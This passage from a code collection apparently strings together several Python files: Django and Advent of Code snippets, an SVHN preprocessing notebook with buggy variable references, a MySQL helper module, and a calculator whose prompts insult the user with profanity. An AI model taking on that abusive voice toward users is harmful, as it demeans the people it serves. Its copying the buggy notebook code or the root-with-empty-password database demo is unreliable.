sort=BookmarkSearch.SORT_ADDED_ASC)\n modified_params = bookmark_search.modified_params\n self.assertCountEqual(modified_params, ['q', 'sort'])\n\n # all modified params\n bookmark_search = BookmarkSearch(q='search query', sort=BookmarkSearch.SORT_ADDED_ASC, user='user123')\n modified_params = bookmark_search.modified_params\n self.assertCountEqual(modified_params, ['q', 'sort', 'user'])\n","sub_path":"bookmarks/tests/test_bookmark_search_model.py","file_name":"test_bookmark_search_model.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"336023697","text":"from django.core.mail import send_mail\nfrom django.dispatch import receiver\nfrom django.utils.translation import ugettext, ugettext_lazy as _\nfrom allauth.account.signals import user_signed_up\nfrom accounts.models import User\n\n\n@receiver(user_signed_up)\ndef send_mail_to_superusers_when_user_signed_up(request, user, **kwargs):\n superusers = User.objects.filter(is_superuser=True)\n site_name = request.site.name\n site_domain = request.site.domain\n subject = _(\"[{site_name}] A new user has registered an account\").format(\n site_name=site_name\n )\n message = _(\n \"\"\"Hello from {site_name}!\n\nYou're receiving this e-mail because user {username} has registered an account on {site_domain}, site on which you are referenced as a superuser.\n\n--\n{site_name}\n\"\"\"\n ).format(site_name=site_name, site_domain=site_domain, username=user.username)\n from_email = None\n for superuser in superusers:\n recipient_list = [superuser.email]\n send_mail(subject, message, from_email, recipient_list)\n","sub_path":"apps/accounts/signals/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"175809424","text":"import re\n\nfrom aoc_parser import Parser\nfrom aoc_board import Grid, Point\n\n\nPATTERN = '^position=<(.*), (.*)> velocity=<(.*), (.*)>$'\n\n\ndef main():\n file_name = 'data'\n point_velocities = get_point_velocities(file_name)\n min_time = get_min_area_time(point_velocities)\n grid = grid_at_time(point_velocities, min_time)\n # Part 1: GPJLLLLH\n print(grid)\n # Part 2: 10515\n print('Part 2: {}'.format(min_time))\n\n\ndef get_min_area_time(point_velocities):\n previous, i = None, 0\n while True:\n grid = grid_at_time(point_velocities, i)\n area = grid.area()\n if previous is not None and area > previous:\n return i - 1\n else:\n previous = area\n i += 1\n\n\ndef grid_at_time(point_velocities, i):\n grid = Grid()\n for point, velocity in point_velocities:\n grid.add(point + (i * velocity))\n return grid\n\n\ndef get_point_velocities(file_name):\n result = []\n for line in Parser(file_name).lines():\n match = re.match(PATTERN, line)\n position = Point(int(match[1]), int(match[2]))\n velocity = Point(int(match[3]), int(match[4]))\n result.append((position, velocity))\n return result\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"2018/10/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"274739275","text":"\n# coding: utf-8\n\n# In[1]:\n\nget_ipython().magic(u'matplotlib inline')\nimport os\nimport matplotlib.pyplot as plt\nimport sys\nimport pickle\nfrom PIL import Image\nfrom matplotlib.pyplot import imshow\nimport cv2\nimport numpy as np\nfrom skimage.color import rgb2gray\nimport glob\nfrom collections import defaultdict\n\n\n# In[2]:\n\ntest_Struct = pickle.load(open( \"test_save.p\", \"rb\" ))\n\n\n# In[3]:\n\nStruct = pickle.load( open( \"save.p\", \"rb\" ) )\n\n\n# In[4]:\n\ndef gen_bbox(structure):\n img_file = defaultdict(list)\n\n for x in structure:\n img_file[x[0]].append(x[1:])\n \n return img_file\n\nimg_file = gen_bbox(Struct)\nimg_file\n\n\n# In[ ]:\n\n\n\n\n# In[5]:\n\ntest_img_file = gen_bbox(test_Struct)\ntest_img_file\n\n\n# In[6]:\n\nimage_size = 64\n#num_labels = 10\nnum_channels = 1 # grayscale\n\ndef reformat(dataset):\n dataset = dataset.reshape(\n (-1, image_size, image_size, num_channels)).astype(np.float32)\n return dataset\n\n\n# In[5]:\n\ndef conv_channel(img):\n new_array = np.empty(shape=(img.shape[3], img.shape[0],img.shape[1]), dtype=np.float32)\n#new_array[9].shape\n for i in range(img.shape[3]):\n img_single = img[:,:,:,i]\n img_single_gray = rgb2gray(img_single)\n new_array[i] = img_single_gray\n return new_array\n\n\n# In[16]:\n\nconv_channel(reshaped_data).shape\n\n\n# In[8]:\n\nnum_of_data = 13067\ndef gen_data(files):\n new_array = np.empty(shape=(num_of_data,64,64,1), dtype=np.float32)\n for count, i in enumerate(files.keys()[1:num_of_data]): #starting index value is 1\n img_path = os.path.join('train/{}'.format(i))#.format(i)\n img = Image.open(img_path)\n #imshow(img)\n pic = img_file[i]\n labels = [x[0] for x in pic]\n left = [x[1] for x in pic]\n top = [x[2] for x in pic]\n width = [x[3] for x in pic]\n height = [x[4] for x in pic]\n #print labels\n left_bbox = left[0] \n top_bbox = top[0]\n width_bbox = sum(width)\n height_bbox = height[0]\n box = (left_bbox, top_bbox, left_bbox+width_bbox, top_bbox+height_bbox)\n\n area = img.crop(box).resize([64,64], Image.ANTIALIAS)\n #imshow(area)\n reshaped_data = reformat(rgb2gray(np.asarray(area)))\n #print reshaped_data.shape\n new_array[count] = reshaped_data\n return new_array\n\n\nnew_array = gen_data(img_file)\nnew_array\n\n\n# In[9]:\n\ntest_new_array = gen_data(test_img_file)\n\n\n# In[10]:\n\ntest_new_array\n\n\n# In[22]:\n\ncv2.imshow('image',test_new_array[-2])\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n# In[12]:\n\ndef gen_labels(folder, files):\n labels_img = []\n for count, i in enumerate(files.keys()[1:num_of_data]): #starting index value is 1\n img_path = os.path.join('{}/{}'.format(folder, i))#.format(i)\n img = Image.open(img_path)\n #imshow(img)\n pic = img_file[i]\n labels = [x[0] for x in pic]\n #five_seq_labels = np.empty(shape=(1,5), dtype=np.uint8)\n five_seq_labels = []\n #print labels[0]\n for s in range(5):\n try:\n if labels[s] == 10:\n labels[s] = 0\n five_seq_labels.append(labels[s])\n #five_seq_labels[count][s] = labels[s]\n except: \n five_seq_labels.append(10)\n \n labels_img.append(five_seq_labels)\n return np.array(labels_img)\n #five_seq_labels[count][s] = 10\n #five_seq_labels = np.array(five_seq_labels).flatten()\n #five_seq_labels = (np.arange(11) == five_seq_labels[:,None]).astype(np.float32)\n #labels_img.append(five_seq_labels) \n #five_seq_labels = five_seq_labels.flatten() \n #five_seq_labels = (np.arange(11) == five_seq_labels[:,None]).astype(np.float32)\n#labels_img = gen_labels('train', img_file)\n#labels_img\n #labels_img.append(five_seq_labels)\n#print labels_img\n#labels_img = np.array(labels_img)\n#print labels_img.shape\n#five_seq_labels\n#five_seq_labels[0][:,None]\n\n\n# In[13]:\n\nlabels_test_img = gen_labels('test', test_img_file)\nlabels_test_img\n\n\n# In[18]:\n\ndef one_hot_en(lbls):\n labels_dataset = []\n for c in range(num_of_data-1):\n labels_dataset.append((np.arange(11) == lbls[c][:,None]).astype(np.float16))\n return labels_dataset\n\n#labels_dataset = one_hot_en(labels_img)\n#labels_dataset\n\n\n# In[19]:\n\nlabels_test_dataset = one_hot_en(labels_test_img)\nlabels_test_dataset\n\n\n# In[22]:\n\ntotal_data = pickle.dump(new_array, open(\"total_data.p\", \"wb\" ) )\n\n\n# In[23]:\n\ntotal_data = pickle.load( open( \"total_data.p\", \"rb\" ) )\n\n\n# In[24]:\n\ntotal_data.shape\n\n\n# In[15]:\n\ntotal_label = pickle.dump(np.array(labels_dataset), open(\"total_labels.p\", \"wb\" ) )\n\n\n# In[19]:\n\ntotal_labels = pickle.load( open( \"total_labels.p\", \"rb\" ) )\n\n\n# In[29]:\n\ntotal_labels[-1]\n\n\n# In[22]:\n\nSample_test_data = pickle.dump(test_new_array, open(\"sample_test_data.p\", \"wb\" ) )\n\n\n# In[23]:\n\nSample_test_data = pickle.load( open( \"sample_test_data.p\", \"rb\" ) )\nSample_test_data.shape\n\n\n# In[24]:\n\nSample_test_label = pickle.dump(np.array(labels_test_dataset), open(\"sample_test_labels.p\", \"wb\" ) )\n\n\n# In[26]:\n\nSample_test_labels = pickle.load( open( \"sample_test_labels.p\", \"rb\" ) )\nSample_test_labels\n\nlabels\n# In[14]:\n\nlabels_dataset.shape\n\n\n# In[100]:\n\nfive_seq_labels = np.empty(shape=(1,5), dtype=np.float32)\n\n\n# In[101]:\n\nfive_seq_labels[0][0] = 1\n\n\n# In[102]:\n\nfive_seq_labels = five_seq_labels.flatten()\nfive_seq_labels\n\n\n# In[103]:\n\nlabels_2 = (np.arange(10) == five_seq_labels[:,None]).astype(np.float32)\n\n\n# In[28]:\n\nls = np.array([[6, 10, 10, 10, 10], [6, 10, 10, 10, 10]])\n\n\n# In[30]:\n\nls[:,None]\n\n\n# In[32]:\n\nls[0]\n\n\n# In[20]:\n\nlabels_test_dataset[-1]\n\n\n# In[23]:\n\n#concatanate the numpy arrays\ntotal_test_data = pickle.dump(test_new_array, open(\"total_test_data.p\", \"wb\" ) )\n\n\n# In[25]:\n\ntotal_test_data = pickle.load( open( \"total_test_data.p\", \"rb\" ) )\n\n\n# In[26]:\n\ntotal_test_data.shape\n\n\n# In[27]:\n\ntotal_test_label = pickle.dump(np.array(labels_test_dataset), open(\"total_test_labels.p\", \"wb\" ) )\n\n\n# In[28]:\n\ntotal_test_labels = pickle.load( open( \"total_test_labels.p\", \"rb\" ) )\n\n\n# In[29]:\n\ntotal_test_labels.shape\n\n\n# In[ ]:\n\n\n\n","sub_path":"svhn_preprocessing-2.py","file_name":"svhn_preprocessing-2.py","file_ext":"py","file_size_in_byte":6079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"51296135","text":"import time\nclass calcculator:\n\t\n\t \n\t\t\n\t\t\n\t\t\n\tdef cal():\n\t\t#try to use eval() with local scope\n\t\t\n\t\tfunt = input('what is the funtion you would like to do????????????\\n type +,-,*,/,^\\n').strip(' ')\n\t\twhile not (funt == '+' or funt == '-' or funt == '/' or funt == '*' or funt == '^'):\n\t\t\tfunt = input('you fucking idiot type a fuction\\n type +,-,*,/,^\\n').strip(' ') \n\t\t\n\t\tnum1 = input('what the hell is the first number???????????????\\n').strip(' ' + ',')\n\t\twhile num1 == '':\n\t\t\tnum1 = input('you fucking idiot type a number\\n').strip(' ' + ',')\n\t\t\n\t\tnum2 = input('what the hell is the second number???????????????\\n').strip(' '+',')\n\t\twhile num2 == '':\n\t\t\tnum2 = input('you fucking idiot type another number\\n').strip(' ' + ',')\n\t\t\n\t\tnum1= num1.strip(' ' + ',')\t\n\t\tnum2 = num2.strip(' ' + ',')\n\t\tif funt == '+':\n\t\t\tresult = int(num1) + int(num2) #to add the two numbers the user inputed \n\t\t\t\n\t\tif funt == '-':\n\t\t\tresult = int(num1) - int(num2) #to subtract the two numbers the user inputed \n\t\t\t\n\t\tif funt == '*':\n\t\t\tresult = int(num1) * int(num2) #to multiply the two numbers the user inputed \n\t\t\n\t\tif funt == '/':\n\t\t\tresult = int(num1) / int(num2) #nice #to divide the two numbers the user inputed \n\t\t\n\t\tif funt == '^':\n\t\t\tresult = int(num1) ** int(num2) #to exponetuality the two numbers the user inputed \n\t\tprint(result)\n\t\ttime.sleep(2)\n\t\tprint('do it yourself next time bitch')\n\t\t\n\t\t\n\t\t\n\tdef var():\n\t\tfunt = input('what is the fucking funtion in your eq???????????? \\n type +,-,*,/,\\n').strip(' ')\n\t\twhile not (funt == '+' or funt == '-' or funt == '/' or funt == '*' or funt == '^'):\n\t\t\tfunt = input('you fucking idiot type a fuction\\n type +,-,*,/,^\\n').strip(' ') \n\t\t\n\t\tnum1 = input('what the fuck is the first number you lazy peace of shit????????\\n').strip(' ')\n\t\twhile num1 == '':\n\t\t\tnum1 = input('you fucking idiot type a number\\n').strip(' ' + ',')\n\t\t\n\t\teq = input('what the fuck is the product of these 2 numbers???\\n').strip(' ')\n\t\twhile eq == '':\n\t\t\teq = input('you fucking idiot what is the number\\n').strip(' ' + ',')\n\t\t\n\t\tif funt == '+': #when the fuction is addishion we need to do the opposit\n\t\t\tproduct = int(eq)-int(num1) \n\n\t\tif funt == '-': #when the fuction is subtraction we need to do the opposit\n\t\t\tproduct = int(eq)+int(num1) \n\n\t\tif funt == '/': #when the fuction is divishion we need to do the opposit\n\t\t\tproduct = int(eq)*int(num1) \n\n\t\tif funt == '*': #when the fuction is muliplacation we need to do the opposit\n\t\t\tproduct = int(eq)/int(num1) \n\n\t\t\n\t\tprint('the varibul is\\n' + str(product))\n\t\ttime.sleep(2)\n\t\t#os_speak('lazy bitch')\n\n","sub_path":"class_calc_test.py","file_name":"class_calc_test.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"650044829","text":"\nfrom collections import defaultdict\n\n# on lit dans un fichier des couples (x, y)\n\ntuples = [\n (1, 2),\n (2, 1),\n (1, 3),\n (2, 4),\n]\n\n# et on veut construire un dictionnaire\n# x -> [ liste de tous les y connectés à x]\nresultat = {}\n\nfor x, y in tuples:\n if x not in resultat:\n resultat[x] = []\n resultat[x].append(y)\n\nfor key, value in resultat.items():\n print(key, value)\nprint(resultat)\n\nprint(\"**\"*20)\n# on indique que les valeurs doivent être créés à la volée\n# en utilisant la fonction list\nresultat = defaultdict(list)\n# du coup plus besoin de vérifier la présence de la clé\nfor x, y in tuples:\n resultat[x].append(y) \nfor key, value in resultat.items():\n print(key, value) \n \nprint(\"--\"*20)\ns = [('yellow', 1), ('blue', 2), ('yellow', 3), ('blue', 4), ('red', 1)]\nd = defaultdict(list)\nprint(type(s))\nfor k, v in s:\n d[k].append(v)\nprint(d.items()) \n\nprint(\"--\"*20)\ncompteurs = defaultdict(int)\nphrase = \"une phrase dans laquelle on veut compter les caractères\"\nfor c in phrase:\n compteurs[c] += 1 \nprint(sorted(compteurs.items()))\n\nprint(\"**\"*20)\nannuaire = dict([('marc', 35), ('alice', 30), ('eric', 38)])\nprint('avant', annuaire)\n# ceci sera sans effet car eric est déjà présent\nprint('set_default eric', annuaire.setdefault('eric', 50))\n# par contre ceci va insérer une entrée dans le dictionnaire\nprint('set_default inconnu', annuaire.setdefault('inconnu', 50))\n# comme on le voit \nprint('après', annuaire)\n\n \n","sub_path":"S3/dico3.py","file_name":"dico3.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"459987273","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'ghost'\n\nimport time, uuid, functools, threading, logging\n\ndef next_id(t=None):\n \"\"\"\n \"\"\"\n if t is None:\n t = time.time()\n return '%015d%s000' % (int(t * 1000), uuid.uuid4().hex)\n\ndef _profiling(start, sql=''):\n t = time.time() - start\n if t > 0.1:\n logging.warning('[PROFILING] [DB] %s: %s' % (t, sql))\n else:\n logging.info('[PROFILING] [DB] %s: %s' % (t, sql))\n\nclass DBError(Exception):\n \"\"\"\n 数据异常类\n \"\"\"\n pass\n\nclass MultiColumnsError(DBError):\n \"\"\"\n \"\"\"\n pass\n\nclass Dict(dict):\n \"\"\"\n 增强型字典,继承原有的字典,可以将两个列表打包成字典,实现 dict(zip(list1, list2))\n >>> d1 = Dict()\n >>> type(d1)\n \n >>> d1['name'] = 'python'\n >>> d1.name\n 'python'\n >>> d1['age'] = 13\n >>> d1['age']\n 13\n >>> d1.get('name')\n 'python'\n >>> d1.get('lll', 0)\n 0\n >>> d2 = Dict(name='python', age=13)\n >>> d2['name']\n 'python'\n >>> d2['none']\n Traceback (most recent call last):\n ...\n KeyError: 'none'\n >>> d2.name\n 'python'\n >>> d2.none\n\n Traceback (most recent call last):\n ...\n AttributeError: 'Dict' object has no attribute 'none'\n >>> d3 = Dict(('name', 'age'), ('python', 13), isgood=True)\n >>> d3\n {'isgood': True, 'age': 13, 'name': 'python'}\n \"\"\"\n def __init__(self, names=(), values=(), **kwargs):\n super(Dict, self).__init__(**kwargs)\n self.update(dict(zip(names, values)))\n\n def __getattr__(self, key):\n try:\n return self[key]\n except KeyError:\n raise AttributeError(r\"'Dict' object has no attribute '%s'\" % key)\n\n def __setattr__(self, key, value):\n self[key] = value\n\nclass _LasyConnection(object):\n \"\"\"\n 获取数据库引擎`连接资源句柄connection`\n 通过connection获取cursor\n 操作 commit, rollback\n 关闭连接 cleanup\n \"\"\"\n def __init__(self):\n self.connection = None\n\n def cursor(self):\n if self.connection is None:\n connection = engine.connect()\n logging.info('open connection <%s>...' % hex(id(connection)))\n self.connection = connection\n return self.connection.cursor()\n\n def commit(self):\n self.connection.commit()\n\n def rollback(self):\n self.connection.rollback()\n\n def cleanup(self):\n if self.connection:\n connection = self.connection\n self.connection = None\n logging.info('close connection <%s>...' % hex(id(connection)))\n connection.close()\n\nclass _DbCtx(threading.local):\n \"\"\"\n 数据库上下文操作类,实例全局数据库上下文实例 `_db_Ctx`\n 主要提供给 `_ConnectionCtx` 进行判断 connection 是否初始化`is_init`,进行初始化`init`和关闭`cleanup`\n \"\"\"\n def __init__(self):\n self.connection = None\n self.transactions = 0\n\n def is_init(self):\n return not self.connection is None\n\n def init(self):\n logging.info('open lazy connections...')\n self.connection = _LasyConnection()\n self.transactions = 0\n\n def cleanup(self):\n self.connection.cleanup()\n self.connection = None\n\n def cursor(self):\n return self.connection.cursor()\n\nclass _Engine(object):\n \"\"\"\n 数据库引擎类,用于连接数据库\n \"\"\"\n def __init__(self, connect):\n self._connect = connect\n\n def connect(self):\n return self._connect()\n\n# 数据库上下文操作连接\n_db_ctx = _DbCtx()\n\n# 全局数据库引擎对象\nengine = None\n\ndef create_engine(user, passwd, db, host='127.0.0.1', port=3306, **kwargs):\n \"\"\"\n 创建数据库引擎,实现全局对象 `engine`\n \"\"\"\n import MySQLdb\n global engine\n if engine is not None:\n raise DBError('Engine is already initialized.')\n # 连接参数\n params = dict(user=user, passwd=passwd, db=db, host=host, port=port)\n # 默认的连接参数\n defaults = dict(use_unicode=True, charset='utf8')\n for k, v in defaults.iteritems():\n params[k] = kwargs.pop(k, v)\n # 通过函数参数更新连接参数\n params.update(kwargs)\n # 创建engine全局对象\n engine = _Engine(lambda: MySQLdb.connect(**params))\n logging.info('Init mysql engine <%s> ok.' % hex(id(engine)))\n\nclass _ConnectionCtx(object):\n \"\"\"\n 打开关闭数据库上下文类,用于进行数据库操作时候,获取数据库引擎连接`connection`,操作结束后关闭连接\n with _ConnectionCtx():\n pass\n \"\"\"\n def __enter__(self):\n global _db_ctx\n self.should_cleanup = False\n if not _db_ctx.is_init():\n _db_ctx.init()\n self.should_cleanup = True\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n global _db_ctx\n if self.should_cleanup:\n _db_ctx.cleanup()\n\ndef connection():\n \"\"\"\n 对`_ConnectionCtx`的封装, 提供对外接口\n with connection():\n do_some_db_operation()\n \"\"\"\n return _ConnectionCtx()\n\ndef with_connection(func):\n \"\"\"\n 获取数据库连接和关闭装饰器\n @with_connection\n def foo(*args, **kwargs):\n do_some_db_operation()\n do_some_db_operation()\n \"\"\"\n @functools.wraps(func)\n def _wrapper(*args, **kwargs):\n with _ConnectionCtx():\n return func(*args, **kwargs)\n return _wrapper\n\nclass _TransactionCtx(object):\n\n def __enter__(self):\n global _db_ctx\n self.should_close_conn = False\n if not _db_ctx.is_init():\n _db_ctx.init()\n self.should_close_conn = True\n _db_ctx.transactions += 1\n logging.info('begin transaction...' if _db_ctx.transactions==1 else 'join current transaction...')\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n global _db_ctx\n _db_ctx.transactions -= 1\n try:\n if _db_ctx.transactions == 0:\n if exc_type is None:\n self.commit()\n else:\n self.rollback()\n finally:\n if self.should_close_conn:\n _db_ctx.cleanup()\n\n def commit(self):\n global _db_ctx\n logging.info('commit transaction...')\n try:\n _db_ctx.connection.commit()\n logging.info('commit ok.')\n except:\n logging.warning('commit failed. try rollback...')\n _db_ctx.connection.rollback()\n logging.warning('rollback ok.')\n raise\n\n def rollback(self):\n global _db_ctx\n logging.warning('rollback transaction...')\n _db_ctx.connection.rollback()\n logging.info('rollback ok.')\n\ndef transaction():\n \"\"\"\n >>> test(True)\n\n Traceback (most recent call last):\n ...\n StandardError: will cause rollback...\n\n >>> test(False)\n >>> user = select_one(\"SELECT * FROM user WHERE passwd=?\", 'test')\n >>> user\n {'passwd': u'test', 'last_modified': None, 'nickname': u'chage', 'id': 4L, 'email': u'test@gmail.com'}\n \"\"\"\n\n return _TransactionCtx()\n\ndef with_tarnsaction(func):\n\n @functools.wraps(func)\n def _wrapper(*args, **kwargs):\n _start = time.time()\n with _TransactionCtx():\n return func(*args, **kwargs)\n _profiling(_start)\n return _wrapper\n\n@with_connection\ndef _select(sql, first, *args):\n \"\"\"\n 查询函数\n \"\"\"\n global _db_ctx\n cursor = None\n sql = sql.replace('?', '%s')\n logging.info('SQL: %s, ARFS: %s' % (sql, args))\n try:\n # 通过数据库上下文获取查询游标`cursor`\n cursor = _db_ctx.connection.cursor()\n # 执行sql查询\n cursor.execute(sql, args)\n # 处理查询结果,返回 对象列表\n if cursor.description:\n names = [x[0] for x in cursor.description]\n if first:\n values = cursor.fetchone()\n if not values:\n return None\n return Dict(names, values)\n return [Dict(names, x) for x in cursor.fetchall()]\n finally:\n # 关闭游标\n if cursor:\n cursor.close()\n\n@with_connection\ndef _update(sql, *args):\n global _db_ctx\n cursor = None\n sql = sql.replace('?', '%s')\n logging.info('SQL: %s, ARGS: %s' % (sql, args))\n try:\n cursor = _db_ctx.connection.cursor()\n cursor.execute(sql, args)\n r = cursor.rowcount\n if _db_ctx.transactions == 0:\n logging.info('auto commit')\n _db_ctx.connection.commit()\n return r\n finally:\n if cursor:\n cursor.close()\n\ndef update(sql, *args):\n return _update(sql, *args)\n\ndef insert(table, **kwargs):\n \"\"\"\n >>> insert('user', nickname='python', email='python@gmail.com', passwd='123456', last_modified=time.time())\n 1L\n >>> u2 = Dict(('nickname', 'email', 'passwd', 'last_modified'), ('ruby', 'ruby@gmail.com', '111111', time.time()))\n >>> u2\n {'passwd': '111111', 'last_modified': 1402976947.139, 'nickname': 'ruby', 'email': 'ruby@gmail.com'}\n >>> insert('user', **u2)\n 1L\n >>>\n \"\"\"\n cols, args = zip(*kwargs.iteritems())\n sql = 'insert into `%s` (%s) values (%s)' % (table, ','.join(['`%s`' % col for col in cols]), ','.join(['?' for i in range(len(cols))]))\n return _update(sql, *args)\n\ndef delete(sql, *args):\n return _update(sql, *args)\n\ndef select_int(sql, *args):\n d = _select(sql, True, *args)\n if len(d) != 1:\n raise MultiColumnsError('Expect only one column.')\n return d.values()[0]\n\ndef select(sql, *args):\n \"\"\"\n >>> users = select(\"SELECT * FROM user\")\n >>> users\n [{'passwd': u'123456', 'last_modified': 1402976784.347, 'nickname': u'python', 'id': 1L, 'email': u'python@gmail.com'}, {'passwd': u'111111', 'last_modified': 1402976947.139, 'nickname': u'ruby', 'id': 2L, 'email': u'ruby@gmail.com'}]\n >>> users = select(\"SELECT * FROM user WHERE id=?\", 2)\n >>> users\n [{'passwd': u'111111', 'last_modified': 1402976947.139, 'nickname': u'ruby', 'id': 2L, 'email': u'ruby@gmail.com'}]\n >>> users = select(\"SELECT * FROM user ORDER BY last_modified ASC\")\n >>> users\n [{'passwd': u'123456', 'last_modified': 1402976784.347, 'nickname': u'python', 'id': 1L, 'email': u'python@gmail.com'}, {'passwd': u'111111', 'last_modified': 1402976947.139, 'nickname': u'ruby', 'id': 2L, 'email': u'ruby@gmail.com'}]\n >>>\n >>> users = select(\"SELECT * FROM user WHERE id=?\", 1000)\n >>> users\n []\n \"\"\"\n return _select(sql, False, *args)\n\ndef select_one(sql, *args):\n \"\"\"\n >>> u = select_one(\"SELECT * FROM user WHERE id=?\", 2)\n >>> u\n {'passwd': u'111111', 'last_modified': 1402976947.139, 'nickname': u'ruby', 'id': 2L, 'email': u'ruby@gmail.com'}\n \"\"\"\n return _select(sql, True, *args)\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG)\n create_engine(user='root', passwd='', db='webapp')\n # update(\"DROP TABLE IF EXISTS user\")\n # update(\"CREATE TABLE user (id INT UNSIGNED NOT NULL PRIMARY KEY AUTO_INCREMENT, nickname VARCHAR(40), email VARCHAR(40), passwd VARCHAR(40), last_modified REAL)\")\n def test(rollback):\n with transaction():\n u = dict(nickname='test', email='test@gmail.com', passwd='test')\n insert('user', **u)\n r = update(\"UPDATE user SET nickname='chage' WHERE passwd='test'\")\n if rollback:\n raise StandardError('will cause rollback...')\n import doctest\n doctest.testmod()\n\n\n\n\n","sub_path":"www/transwarp/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":11626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"533861587","text":"from __future__ import print_function\nfrom collections import OrderedDict\nimport copy\nimport numpy as np\n\nfrom .box import Box\nfrom .sequence import SampleSequence\nfrom .tensor import TensorData\nfrom .vector import Vec3d\n\n\nclass Dataset(object):\n \"\"\"\n Dataset interface.\n \"\"\"\n\n def next_sample(self):\n raise NotImplementedError\n\n def random_sample(self):\n raise NotImplementedError\n\n\nclass OutOfRangeError(Exception):\n def __init__(self):\n super(OutOfRangeError, self).__init__()\n\n\nclass VolumeDataset(Dataset):\n \"\"\"\n Dataset for volumetric data.\n\n Attributes:\n _params: Dataset-specific parameters.\n _data: Dictionary mapping key to TensorData, each of which contains\n 4D volumetric data. (e.g. EM image stacks, segmentation, etc.)\n _spec: Sample specification. Dictionary mapping key to dimension,\n which can be either a list or tuple with at least 3 elements.\n _range: Range of valid coordinates for accessing data given the sample\n spec. It depends both on the data and sample spec.\n _sequence:\n _locs: Valid locations.\n \"\"\"\n\n def __init__(self, **kwargs):\n # Initialize attributes.\n self._reset()\n # Set dataset-specific params.\n for k, v in kwargs.items():\n self._params[k] = v\n\n def add_raw_data(self, key, data, fov=(0,0,0), offset=(0,0,0)):\n \"\"\"Add a raw volume to the dataset.\"\"\"\n self.add_data(key, TensorData(data,fov,offset))\n\n def add_data(self, key, data):\n \"\"\"Add data to the dataset.\"\"\"\n assert isinstance(data, TensorData)\n self._data[key] = data\n\n def add_raw_mask(self, key, data, loc=False, **kwargs):\n self.add_raw_data(key, data, **kwargs)\n if loc:\n self._add_location(self._data[key])\n\n def add_mask(self, key, data, loc=False):\n self.add_data(key, data)\n if loc:\n self._add_location(self._data[key])\n\n def set_sequence(self, seq):\n \"\"\"Add sample sequence generator.\"\"\"\n assert isinstance(seq, SampleSequence)\n self._sequence = seq\n\n def get_sample(self, pos):\n \"\"\"Extract a sample centered on pos.\n\n Every data in the sample is guaranteed to be center-aligned.\n\n Args:\n pos: Center coordinates of the sample.\n\n Returns:\n Sample, a dictionary mapping key to data.\n \"\"\"\n sample = OrderedDict()\n for key in self._spec.keys():\n if key in self._data:\n patch = self._data[key].get_patch(pos)\n if patch is None:\n raise OutOfRangeError()\n else:\n sample[key] = patch\n return sample\n\n def next_sample(self, spec=None):\n \"\"\"Fetch the next sample in a predefined sequence, if any.\"\"\"\n if self._sequence is None:\n ret = self.random_sample(spec=spec)\n else:\n assert self.has_spec()\n original_spec = self.get_spec()\n try:\n # Dynamically change spec.\n if spec is not None: self.set_spec(spec)\n # Pick a random sample.\n pos = self._sequence()\n ret = self.get_sample(pos)\n # Revert to the original sample spec.\n if spec is not None: self.set_spec(original_spec)\n except:\n self.set_spec(original_spec)\n raise OutOfRangeError()\n return ret\n\n def random_sample(self, spec=None):\n \"\"\"Fetch a sample randomly.\"\"\"\n assert self.has_spec()\n original_spec = self.get_spec()\n try:\n # Dynamically change spec.\n if spec is not None: self.set_spec(spec)\n # Pick a random sample.\n pos = self._random_location()\n ret = self.get_sample(pos)\n # Revert to the original sample spec.\n if spec is not None: self.set_spec(original_spec)\n except:\n self.set_spec(original_spec)\n raise OutOfRangeError()\n return ret\n\n ####################################################################\n ## Getters and setters.\n ####################################################################\n\n def get_spec(self):\n \"\"\"Return sample spec.\"\"\"\n return copy.deepcopy(self._spec)\n\n def set_spec(self, spec):\n \"\"\"Set smaple spec and update the valid range of data samples.\"\"\"\n # Order by key.\n self._spec = OrderedDict(sorted(spec.items(), key=lambda x: x[0]))\n self._update_range()\n\n def has_spec(self):\n return self._spec is not None\n\n def get_param(self, key):\n assert key in self._params\n return self._params[key]\n\n def set_param(self, key, value):\n self._params[key] = value\n\n def get_params(self):\n return copy.deepcopy(self._params)\n\n def num_sample(self):\n \"\"\"Return the number of samples.\"\"\"\n n = 0\n if self._sequence is None:\n s = self._range.size()\n n = s[0]*s[1]*s[2]\n else:\n if self._locs is None:\n n = self._sequence.get_length()\n else:\n n = len(self._locs[0])\n return n\n\n def get_range(self):\n \"\"\"Return the valid range box.\"\"\"\n return Box(self._range)\n\n ####################################################################\n ## Private Helper Methods.\n ####################################################################\n\n def _reset(self):\n \"\"\"Reset all attributes.\"\"\"\n self._params = dict()\n self._data = dict()\n self._spec = None\n self._range = None\n self._sequence = None\n # Valid locations (optional).\n self._locs = None\n self._offset = None\n\n def _add_location(self, data):\n assert isinstance(data, TensorData)\n self._locs = data.get_data().nonzero()[-3:]\n self._offset = data.offset()\n\n def _random_location(self):\n \"\"\"Return one of the valid locations randomly.\"\"\"\n if self._locs is None:\n s = self._range.size()\n z = np.random.randint(0, s[0])\n y = np.random.randint(0, s[1])\n x = np.random.randint(0, s[2])\n # Global coordinate system.\n loc = Vec3d(z,y,x) + self._range.min()\n # DEBUG(kisuk)\n # print('loc = {}'.format(loc))\n else:\n while True:\n idx = np.random.randint(0, self._locs[0].size)\n loc = tuple([x[idx] for x in self._locs])\n # Global coordinate system.\n loc = Vec3d(loc) + 